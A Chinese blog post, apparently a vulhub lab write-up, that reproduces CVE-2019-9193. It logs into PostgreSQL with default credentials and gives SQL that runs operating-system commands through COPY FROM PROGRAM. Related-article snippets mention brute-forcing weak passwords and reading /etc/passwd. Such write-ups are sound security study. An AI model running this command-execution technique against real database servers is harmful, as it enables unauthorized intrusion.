PostgreSQL 高权限命令执行漏洞 CVE-2019-9193 漏洞复现

最新推荐文章于 2024-06-18 11:01:11 发布
最新推荐文章于 2024-06-18 11:01:11 发布
阅读量490 收藏
点赞数
分类专栏: vulhub_Writeup 文章标签: PostgreSQL CVE-2019-9193 命令执行 权限漏洞 数据库安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114489615
版权

PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)

by ADummy

0x00利用路线

​ 连接到数据库,直接命令执行

0x01漏洞介绍

​ PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。

影响版本

PostgreSQL < 11

0x02漏洞复现

环境启动后,将开启Postgres默认的5432端口,默认账号密码为postgres/postgres。

登录postgres: psql --host your-ip --username postgres

并执行参考链接中的POC:

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中:

在这里插入图片描述

ADummy_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞复现PostgreSQL权限命令执行(CVE-2019-9193)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-01 384
这个漏洞是一个版本漏洞从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令利用的前提1、需要登录2、需要权限所以要先弱口令爆破之后,然后查看是否是权限
PostgreSQL 远程代码执行漏洞分析及利用—【CVE-2018-1058】
3569
03-07 2811
https://xianzhi.aliyun.com/forum/topic/2109漏洞描述A flaw was found in the way Postgresql allowed a user to modify the behavior of a query for other users. An attacker with a user account could use this f...
Web安全基础学习:SQL注入漏洞PostgreSql注入
最新发布
qq_51862722的博客
06-18 1088
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
CVE-2019-9193 复现
qq_41252520的博客
08-24 862
CVE-2019-9193PostgreSql 命令执行复现 0x0 简介 PostgreSQL作者称为Post-Gres-Q-L,是开源的功能强大的关系型数据库,支持SQL语法。在9.3版本中增加了一个COPY TO/FROM PROGRAM功能。该功能允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。 0x1 影响版本 9.3-11.2 0x2 环境搭建 这里使用的是vulhub环境,进入到vulhub−master/postgres/CVE−20
CVECVE-2019-9193PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3539
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
CVE-2019-9193权限远程命令执行漏洞)vulhub复现
qq_52279315的博客
05-17 546
vulhub靶场复现postgresql
0x18.第十八课 MetaSploit对cve-2019-0708的检测.pdf
06-24
CVE-2019-0708是一个严重的远程代码执行漏洞,影响了多个版本的Windows操作系统,包括Windows 2003、Windows 2008、Windows 2008 R2以及Windows XP等。该漏洞允许攻击者通过未授权的身份验证过程,在目标系统的远程...
django_cve_2019_19844_poc:适用于CVE-2019-19844的PoC(https:www.djangoproject.comweblog2019dec18security-releases)
02-04
django_cve_2019_19844_poc PoC要求Python 3.7.x PostgreSQL 9.5或更建立创建数据库(例如django_cve_2019_19844_poc ) 将数据库名称设置为环境变量DJANGO_DATABASE_NAME (例如, export DJANGO_DATABASE_NAME=...
PostgreSQLpostgresql-13.5-1-windows-x64.exe)
11-20
PostgreSQLpostgresql-13.5-1-windows-x64.exe)适用于Windows x86-64 PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的...
postgresql-12.4-1-windows-x64.exe
09-10
postgresql-12.4-1-windows-x64.exe
postgresql-12.18-1-windows-x64.exe
04-08
postgresql-12.18-1-windows-x64.exe
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
PostgreSQL 权限命令执行漏洞复现(CVE-2019-9193)
又菜又爱倒腾的博客
10-29 1756
#PostgreSQL 权限命令执行漏洞(CVE-2019-9193)# 一、漏洞简介 PostgreSQL是功能强大的数据库软件,可在所有主要操作系统上运行,包括Linux,Windows,Mac OS X等。所公开的漏洞存在于命令“COPY TO / FROM PROGRAM”中,用于导入和导出数据。在“pg_read_server_files”组中的用户执行上述命令之后,可以获得数据库超级用户权限,从而执行任何系统命令。 二、漏洞影响 影响版本 PostgreSQL 9.3-11.2 三、产生原因
CVE-2019-9193PostgreSQL 权限命令执行漏洞复现
m0_69801663的博客
12-23 1104
CVE-2019-9193PostgreSQL 权限命令执行漏洞
漏洞复现PostgreSQL任意命令执行CVE-2019-9193)及被勒索回忆
qq_31042199的博客
08-15 1920
为了复现这样一个漏洞需要首先配置目标靶机,整体测试环境如下: 漏洞名称 CVE-2019-9193 漏洞影响PostgreSQL版本 9.3-11.2 漏洞影响平台 windows+Linux+Mac OS 测试硬件环境 win10(家庭版) 虚拟机版本 ubuntu18.04 本次PostgreSQL版本 10.18 win10与ubuntu虚拟机连接方式 桥接 kali攻击机ip 192.168.31.68 靶机ip
postgre提权(CVE-2019-9193)
weixin_45701675的博客
11-18 1218
PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 提权利用的是漏洞CVE-2019-9193 CVE-2018-1058 本次演示CVE-2019-9193提权 复现步骤 开启测试环境 连接postgres 新建查询,执行 尝试读取敏感文件 cat /etc/passwd,低权限用户无权限查询 测试成功 ...
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1045
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238 漏洞复现
ADummy的博客
03-03 328
Nexus Repository Manager 3 远程命令执行漏洞CVE-2019-7238) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ SNexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将
限制会话id服务端不共享_【干货分享】Web安全漏洞深入分析及其安全编码
weixin_39930276的博客
12-19 401
阅读:13,003超全Web漏洞详解及其对应的安全编码规则,包括:SQL注入、XSS、CSRF、文件上传、路径遍历、越权、XML以及业务安全等,实例告诉你各个漏洞对应的编码规则。给你的代码加把安全锁!一、Web安全基础1.1常见的Web安全漏洞1.2安全编码原则一切输入都是有害的!!!输出也不安全!输入:传参,cookie、session、http header、数据库……输出:异常信息、敏感...
系统漏洞加固方案:HTTP、Redis、PostgreSQL
本文件主要涉及了三个常见的漏洞及其加固方案,包括MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞、Redis未授权访问漏洞以及PostgreSQL数据库空密码漏洞。 1. MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞: 这个...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值